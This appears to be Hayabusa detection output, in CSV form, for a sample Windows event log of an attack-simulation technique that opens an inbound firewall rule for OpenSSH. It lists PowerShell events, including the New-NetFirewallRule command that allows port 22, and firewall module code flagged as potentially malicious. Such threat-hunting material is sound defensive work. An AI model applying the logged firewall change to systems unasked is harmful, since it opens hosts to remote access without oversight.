Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.949 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.950 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.957 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.959 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.976 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.980 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.985 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.994 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.998 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.999 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:30.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:30.043 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:30.044 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:30.046 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:43.608 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:43.609 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') 
-and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.642 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.652 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.653 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
